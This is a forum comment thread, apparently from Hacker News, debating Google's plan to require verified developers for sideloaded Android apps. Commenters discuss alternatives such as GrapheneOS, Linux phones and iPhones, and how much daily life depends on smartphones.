Personally, if I'm not allowed to run the software that I want on my phone, it almost makes more sense for me to get some old flip phone or one of those chinese blackberry knockoffs c.a. 2012. Not out of any principled stance, mind you, it's just that's the level of functionality you'd be reducing me to. Why should I pay $500 when I can find something that gives me the same features on a literal junk pile?
This isn't legal in the EU is it?
It is. Notarization like Apple does is also legal. In fact the EU commission would welcome this with open arms since they can now access the personal data of every developer and can order Google to ban every app they want. This goes hand-in-hand with their new "Digital wallet" app that will be launched next year.
From the announcement
> our recent analysis found over 50 times more malware from internet-sideloaded sources than on apps available through Google Play.
I will believe this when we stop seeing brazen malware in marquee app store apps, e.g. https://www.tracesecurity.com/blog/articles/meta-pixel-and-t...
Of course they will. It started with Play Integrity and hardware remote attestation. Soon Android will be nothing but a shittier version of iOS.
Oh how I wish I could buy a Nokia N900 16 Pro Max and use Maemo 13
The N900. The best mobile device I've ever owned.
Fuck google.
This combined with the 'age verification' coming to all Google properties means it is a very small step from that new world to full Google verification of everything you visit and everything on your device, at any time, for any reason with the penalty being incontestable ban from your device, apps and data.
Get ready for facebook style 'we are interrupting you for a video selfie because we have detected you are a threat' across all google properties (Android, Chrome, Gmail, Maps...).
Move to linux phones, now.
No, fuck you. Absolutely not.
What the hell is a verified developer lol
This has the potential to be disastrous for Google, but maybe not.
Personally: I don't use Apple because I like being able to whip together little apps to side-load without having to check in with a walled-garden mothership. If Google is going to move closer to Apple in that regard... Apple's UX ecosystem is better, so I have far fewer reason to keep using Android.
I suspect this won't be disastrous for Google, because where will people care about this go? Apple, who is even more restrictive? This is just another in a long series of incidents showing why we desperately need a real alternative to the mobile duopoly. I would ditch Android over this, but there's no realistic alternative available to me.
Damn the future sucks ass.
I think the only thing hat can save us is a jailbreak. Either for iOS or Android to let you sideload apps.
Alternatively, and that’s almost bullshit, the dumb phone trend continues and we might get devices like PDAs. Get a dumb phone and a small camera and then your PDA for everything that is essentially an app. Not sure what OS they’d run but I don’t see another way.
Android also allows apps that can run arbitrary code, like emulators and various other runtimes. I think iOS still doesn't? I have not written an Android app in ages, other than at work, but I often write silly little things running in the Löve 2D Loader, or TIC-80, or DOSBox, or just command-line tools running in Termux (I hear there is an X-server as well to run GUI applications from Termux?).
As long as they still allow running stuff inside of apps like that I will probably not abandon ship yet.
They recently allowed emulators, like RetroArch, to be on the app store. They still require the emulators to be written in Swift AFAIK. Still quite a bit more restrictive than Android, but they have slowly been opening up.
Squeeze, Raban. Squeeze hard.
This phase from the last couple of years just had to come - and while it's painful to be exposed to it - it seems highly illogical for us to complain and cry about it.
- "Free" search - yay, let's all use it for everything and even make a verb out of it
- Email - such nice guys, Google - free email forever, what could go wrong if I have my 95% of all my info there
- Maps - yeah, let's all depend on these free Google maps with our lives
- Chrome - ofc, heck yes, let's all use their browser, it's the best and free - no need for anything else
- Google account login for EVERYTHING - so convenient! Google Authenticator app, Google Wallet - yes, more!
- Free mobile operating system - nice, take that, Apple!
Google has taken over a large portion of our lives, step by step - good enough services, on global scale, for free, until they became essential.
They are not evil, like they were never good - they are a company, and in the current socio-economic structure, that means having a duty to use their position to enrich their shareholders - and absolutely have no interest in people's wellbeing or morality or opinions or reputation - unless it temporarily serves to do so more / better.
I'm in no way trying to defend them. Just, with all the futility of it, pointing out how hyper-capitalism we've built/allowed to grow, has reached the stage where it's practically impossible for the "free market" to react / provide solutions that people want. Now the big players decide what people get.
In this case, you can no longer have a high quality phone of a good manufacturer and install on it what you want. Small manufacturer catering to that demographic won't get government certification, you can't have your e.g. Samsung and install a ROM anymore, and you can't install your app freely on Android unless Google lets you. That's all just in a tiny sliver of space.
Our Tetris board barely has any room left for choice and actions.
Relevant as always: https://youtu.be/ntICHMV-WMA?t=38
shameful
was a reason I bought Android. will they be sending me a refund?
I wonder, how hard is it to build an app on the phone from source?
Dick move. Go back to "do no evil" big G. Remember how you used to be the kool kid on the block? Now you've just become the grown up you showed contempt for in your prime time.
I doubt I'll move away from Android too soon, but that definitely makes me reconsider whether any Google services have a right to CPU time on my device.
Absolutely disgusting. No reason to keep using Android then.
iOS is a closed jail even worse. The real solution is to buy uncertified Chinese devices then.
China offering more freedom than the supposed free world
Source: https://android-developers.googleblog.com/2025/08/elevating-... (https://news.ycombinator.com/item?id=45016602)
I can’t say I’m surprised; but I am disappointed.
I don't understand, when the EU announced that Apples "actually we need to sign all of these and pay us" requirement is illegal, Google was like "hold my beer"?
Break them up already, it's getting old.
So, now there will be a single kill switch where a malicious government can legally compel Google to annihilate apps not of their liking.
I find it hard to state how contemptible this is. How stupid. Everyone who worked on this has blood on their hands.
Could someone explain why the personal privacy of software developers is more important than the cybersecurity of consumers and nations please and thank you
Google is really turning into a dystopian company, destroying any goodwill their virtuous employees created in the past. It feels like they are primed to be the main turnkey tyranny facilitators.
Google was always dystopian and evil. They just wore good mask for some time in the beginning.
Keep your phone. All you have to do is say no to digital for:
- money - tickets - identification
They cannot force everyone to own and buy a phone.
Anyone even remotely privacy or security conscious needs to vote with their wallet in protest and stop buying Android phones, otherwise it's only a matter of time 'til Google bans side-loading and it becomes impossible to buy a phone that can run any kind of anonymous or end-to-end encrypted communication software.
Stop buying Android and what? Buy an iPhone that's even more locked down or live like an outcast that can't access essential services? Because those are the realistic options.
For years I've been buying middle-of-the-road Android phones because they provide pretty good bang for the buck, but if I can't use a computer I paid for however the fuck I want, I'm just going to start getting the cheapest crap I can get away with and use it as little as possible. "Vote with your wallet" doesn't have to mean total abstinence.
I think getting a flagship device that's a few years old probably makes for a better experience. I check the LineageOS supported devices list, then search eBay for something from there.
Flip phones can access essential services just fine, if some business or government office is only allowing something to be done via smartphone app, that’s a problem.
A problem for who? Go ahead and raise it, I’m sure the government office will get right on fixing it.
It really isn't that bad. I've never owned a smartphone, and can do everything I need through websites and the occasional phone call.
>live like an outcast that can't access essential services?
I don't own a smartphone and I am happy as ever. I used to own one a while back, but it wasn't worth the effort and the rage when it was slow.
If a service can be accessed only with a smartphone, I complain (which is of little use).
Do you not have to use a 2FA app for things like banking? In Singapore, they are phasing out 2FA options other than the banking app. The banking apps only work on iPhones and Google-approved Android phones. It's pretty bad.
It's kind of stupid when you consider the number of people who don't have screen locks (or else have easily guessable ones) on their phones.
> live like an outcast
in all things. I would encourage you and everyone who reads this post to stare down this option with realistic consideration. In a society this broken, it is the solution to more and more things. To checkout, to accept the hard mode because to pick the path of convenience is to be exploited.
Again, and again, and again.
I've been doing it. That's why I'm vegan.
I'm sorry, this is such a funny follow up comment, I literally lol-ed when I got to it.
Eating on hard-mode is what we do.
I respect at least your choice but I'm not growing tofu on the farm. Veganism is one of those protests that while i appreciate going after factory farms, you're only enabled to do so by large corporations.
You've never tried growing tofu? It pops out of the ground in little cubes. Super easy, barely an inconvenience.
> _I'm not growing tofu on the farm_
What else are you growing?
What if people stopped buying brand new Android phones and instead bought used ones and then installed alternative Android versions and app stores.
Can't access banks, ticket systems etc. unfortunately we are in the era of tightened screws, the freedom is running out :(
Lol all these things work via the web. You just log on via the browswer. Not everything needs an app.
In your country, maybe. Over here you're dead in the water without a smartphone — can't access banking except by going to the branch and standing in the queue for an hour or two, can't access most government services. Limit your selection of goods (like electronics, but not only that) by something like 90% (and also increase prices by 30-50%) because brick and mortar shops sell old crap at much higher cost than it was ever worth, and the only real solution is buying from a major marketplace which is only available as a mobile application.
This concept originated in China and is spreading. Beware.
Can I ask which country? You said originated in China but is it China or another east Asia country?
@achrono (I cannot reply to the other post, I don't know why). Yes, you can use just a web browser.
> Mobile Payments They work with a card, no smartphone required. Moreover, cash didn't cease to exist.
> Navigation Again, physical maps are a thing. Google Maps or OpenStreetMap are accessible by browser. Having a physical map and having to follow road signs can be a beautiful experience. If one is addicted to a machine that tells them where to go, navigators are still a thing (no smartphone required)
>All manner of IoT devices
Don't put an IoT device in your house if you don't know what it does and how it works. If the only way to interface to it is via an app... then you don't know what it does and how it works. Don't put it in your house.
>Wearables
I don't even know what are wearables: if I write it on Firefox it underlines it in red. By doing a quick search, I can see images of watches. Watches can work without an app. Moreover, watches that work without an app are usually less expensive than the other kind.
>Digital versions of ID (Mobile Passport Control)
Don't. I know that some governments are pushing this crap thinking it's the future. Simply don't. Imagine you're at the airport and you accidentally drop your passport. You pick it up, nothing lost. Imagine you drop your phone and it stops working. You lost:
- Your documents - Your money (if you rely on your phone for paying and don't have cash with you, which seems a growing trend among people I know) - All your ways to contact people for help
Instead:
- Your wallet is stolen: you lost all your money and your cards, but you have your documents (at least the passport because it surely does not fit a wallet). - Your phone is stolen: you lost all the ways to contact people, but you can buy another one - Your passport is stolen: you can contact your embassy.
Smartphones are becoming a SPOF (Single Point Of Failure) for our lives.
> physical maps
Are you for real? I'm totally on board with using free and open alternatives, but if you're not going on a mountain trail then a physical map is going to be drastically worse than any navigation software.
Also FWIW I have a card-sized passport that I can easily get stolen with my wallet.
Other than banks & ticketing, there is a whole host of things that do in fact need an app.
* Mobile payments
* Navigation
* All manner of IoT devices
* Wearables!
* Digital versions of ID (Mobile Passport Control)
etc.
So no, you can't just use the web.
But, and I hesitate to point it out, because I am finding that people think it is somehow minimal entry stakes, one does not need any of those things..
You wouldn't get very far without WeChat and AliPay in China. Last time a good friend of mine was there, many merchants simply refused to accept cash. The few that did had made it known how much they were inconvenienced by doing that.
Same for basically every interaction with locals, for accessing government services, or even just using the public transportation.
It's pretty similar for locals AFAIK.
And before anyone replies that he didn't have to travel there — no, he did, unless he was willing to look for another job (which are very sparse here, you hold on to a good job for dear life).
Aren't there attestation frameworks under development that they could start using too?
The 2FAs require their mobile app sometimes.
What types of tickets are you referring to here? I’m not familiar with that restriction.
He's talking about concert tickets and similar entertainment events, where several of the major providers no longer provide PDF tickets and instead only send them to a phone app. It is possible to make enough of a stink and collect tickets on the day, but that option is increasingly difficult to find.
you can usually just use the web-interfaces for those services. less convenient, sure, but the options are there.
Buy Apple; the point is to hurt Google. If enough people do it, Google might reconsider. Show them that the open ecosystem is the only value Android added, and if they refuse to bring back the open ecosystem then their platform will slowly die. Won't be long until Google's as locked-down as Apple at this rate, so all Android gives you is a power-hungry OS that protect your privacy even less than iOS does.
Buying closed stuff to show we want an open ecosystem?
At this point, I believe the most effective ways one can help with this is:
(1) advocacy - it's slow and difficult, but having people at least agree / be familiar with the idea that closed stuff is bad is a good first step.
Open ecosystems can't work for the general public if it's trapped in closed networks that won't work on anything else than the two big mobile operating systems, so making people start using open chat apps and such will help a lot. It'll take years, but so be it. It's worth it I think.
(2) helping improve the more open stuff.
I think Linux mobile for instance is a potentially viable alternative in the medium term for at least the basic use cases: Calls, SMS, GPS / Maps, Signal, photos. All this has no reason not to work with some polish. I daily drove Linux mobile 4 years ago for a year. The main thing I'm missing is good hardware for it, and a lot of polish but nothing impossible. Yeah, indeed, no payment with the phone (Google Pay / Apple Pay). But it's still possible to use the physical cards and not use the phone for this.
You've got to be kidding. Doesn't work, Apple is even more locked down than what this article announces. No sideloading whatsoever, signature checks ala Play Protect are mandatory and cannot be switched off, no alternative app stores, etc.
You can side load three apps at a time outside the EU and unlimited inside the EU.
Not sure why this is downvoted. The entire value proposition of Android is the semi-open OS. For things you can’t do with Apple devices, you use the myriad of Android devices out there.
A locked-down Android is pointless.
Yet most of the world runs Android. Its main value proposition was always wide selection of hardware for however much money you're willing to spend, not its relative openness.
I make relatively decent money by our standards, and I wouldn't even think about dropping $700-1000 on a phone (which isn't even officially sold or supported over here). For the vast majority of people it's their whole income over 2-4 months. I don't know or care how much you make, let's say it's $10k per month. Imagine if you had to pay $20-40k for a phone which is good for maybe 5-8 years.
And most of the world is like that.
I'm curious what you think the alternative is, because Apple is definitely a lot worse, and we all know they're very much a duopoly.
BTW, all the GrapheneOS, etc. are still Android phones.
I'm curious if GrapheneOS or other custom Android builds would be able to avoid these restrictions reasonably.
Obviously this is going to impact the supply of apps, since the market share of custom Android is smaller than even the market share of people willing to sideload or use an alternative store on a mainstream Android phone. Many developers might quit the game.
The problem with custom ROMs is that many government, banking, and similar apps don't run on them without workarounds. Some of those apps also consider this as a TOS violation as well.
When Microsoft first proposed a remote attestation scheme for PCs under the name Palladium, it was widely seen as a nightmare scenario. Even the mainstream press was critical[0]. There was barely a whimper when Google introduced Safetynet a decade later.
It wasn't OK in 2003. It wasn't OK in 2014. It isn't OK now. I'm just not sure what anybody can do about it.
[0] https://www.nytimes.com/2003/06/30/business/technology-a-saf...
What changed is that the vast majority of users in 2025 are retarded normies that have never even considered trying to understand how their pocket computers work. And now that they are the majority, the voice of people that have even a remote understanding of how any of this works get drowned in the noise of social media divisiveness. Divide and Conquer. Oldest play in the book.
There are many third-party money apps that login to your online banking that are a violation of ToS. That doesn't stop people using them. In fact, when they get really big, they can be legitimised by banks. For example, to get my mortgage, I had to use a third party service that logs in to my online banking account and ingests all my transactions to show that I saved for my deposit legitimately.
Then I won't run those apps. Seriously. I know not everyone has this option, but it's been my experience that a lot of processes do in fact have workarounds when you show them the cryptic error their poorly behaved app throws.
I have been a GrapheneOS user since the Pixel 3 and have yet to encounter an app that doesn't work on GOS.
I don’t use any utility apps (identity, banking, services etc) on my phone and stick to the desktop web. And don’t use services that do require me to have a Google or apple account and phone. (Spoiler: I do)
I hope my tiny datapoint shows up in some aggregated stats somewhere.
It’s use-it-or-lose-it.
Looks like they can avoid these restrictions:
https://grapheneos.social/@GrapheneOS/115090818389369737
> "GrapheneOS doesn't include Google Mobile Services and the requirements for certification aren't relevant to us."
GrapheneOS uses a sandboxed version of Google Play Services, not the GMS certified devices they mentioned in the article.
I had a Jolla phone on my hands the other day and I must admit this…
SailfishOS is pretty nice
I might get one next
Buy Xperia 10 III while you still can. It's the best SailfishOS phone at the moment.
I have an Xperia 10 III, but it's running AOSP I built myself.
https://developer.sony.com/open-source/aosp-on-xperia-open-d...
Basically none of this new restriction will bother me, since I don't run anything but stock AOSP and get all my apps from f-droid repos.
Eventually you will need a new phone and by then probably all phones will be locked down.
It's really nice when you first use it but if you have to use it as a daily driver it's pure pain. Rather go for graphene.
GrapheneOS is a beautiful stop-gap, but there are real bona-fide Linux smartphones out there. To be clear, there are not many, the hardware often isn't great, the software often isn't great. PinePhone and Librem come to mind.
Cell carriers will just start requiring the attestation as well. And eventually, even an internet connection will - wifi routers will have to attest to ISP equipment, etc.
The final phase is "AI" monitoring everything you do on your devices. Eventually it won't just be passive, either, but likely active: able to change books you read and audio you listen to on-the-fly without your consent. It will be argued that this ok because the program is "objective".
At this point, I would stop using commercial cell carriers and ISP-provided equipment altogether, even if that means setting up mesh networks with an underground community. User control or bust.
I've been keeping an eye on FuriLabs (Furiphone). They maintain FuriOS - Debian with an Android kernel. Has a container for running Android apps. Price is reasonable though I don't know how it'll be affected by tariffs in the US. It's tempting.
https://furilabs.com/shop/flx1/
I really wanted to like Librem and almost bought a phone until I saw this video by Louis Rossmann: https://youtu.be/wKegmu0V75s?si=NzevsJgHD188bRkT
https://www.bunniestudios.com/blog/2020/introducing-precurso... This is the most secure phone that has been made recently.
Per their spec sheet it doesn't have cellular connectivity, so it's not actually a phone.
And if what you want is a PDA that runs Linux, there are many options, e.g. https://www.clockworkpi.com/home-uconsole.
Precursor is neat, but it isn't a phone.
Pretty sure Bunnie named it “precursor” because the plan is to make the actual phone (with a cellular modem) next. If I had the cash to support him and buy a Precursor I would.
Neat concept.
For anyone else failing to resolve DNS for that domain: https://archive.is/q7w0x
In addition to the PinePhone and Librem 5, you can also put postmarketOS on some faster Android phones like the OnePlus 6T.
>real bona-fide Linux
Android is decades ahead of that in security, functionality, utility, devex, and design. It's a fools errand to try and modernize that, over building on top of AOSP.
The alternative is just Apple; if Google loses enough users they might reconsider. Essentially the only real advantage Android had over Apple was being a more free platform/ecosystem; if they're going to do away with that, then they should be shown that this means they'll lose a lot of users.
Even with this change, Android is still more free than iOS by far.
Utterly pointless.
Banking apps, messaging apps, streaming apps, even video games all want locked down devices. They will use hardware cryptography to discriminate against us and refuse service if they can't cryprographically prove we're using a corporate owned device.
Naughty user. Looks like you've been tampering with your device, installing unauthorized software and whatnot. Only money laundering drug trafficking child molesting terrorists do that. I'm gonna have to deny your request to log you into your bank account.
Gives me another reason to use Custom ROM
has anyone had to help any elderly relative with the million scams they've downloaded from google's app store? google does not give a shit about helping regular people avoid scams, it's all just bullshit.
not even to mention the h1b indian kickback stuff that's about to hit them. couldn't happen to a nicer company.
Helping elderly with scams: Yes, today, with Google Chrome. They got tricked into allowing desktop notifications and they look super legit on Microsoft Windows, styled like antivirus notifications and everything, covering the browser UI to get to the settings. I don't see how using closed software helps here
Sorry, we're getting rid of Revanced, Newpipe, Xmanager, etc. for your own good. Just like how Manifest v3 was for security. /s
That might be one of the reasons. Get rid of competition by legal means.
In my case I keep a copy of K9 Mail 5.6 with the original UI (the reason I choose K9) and I sideload it to every device of mine. I'm afraid that I'll have to register an account and what, claim that that K9 is mine?
TL;DR If you're not using Linux by now, do yourself a favor and start. You could do worse than starting with Linux Mint or PopOS, but whatever you do, get ahead of the curve and transition to these user-friendly open sourced OSes. The alternative is far, far worse at the moment.
Well time to make sure mobile Linux is accessible so the blind users aren't the only ones left when all the world switches to Linux /s
aren't there braille terminals that work with linux? I don't know how you would make a rigorous blind UX other than working with a text interface first.
Year of mobile Linux OS? /s
Maybe Elon Musk can save us /s
He won’t.
But China does, and not tomorrow, not in the future, but today already, by selling unrestricted devices
Seems reasonable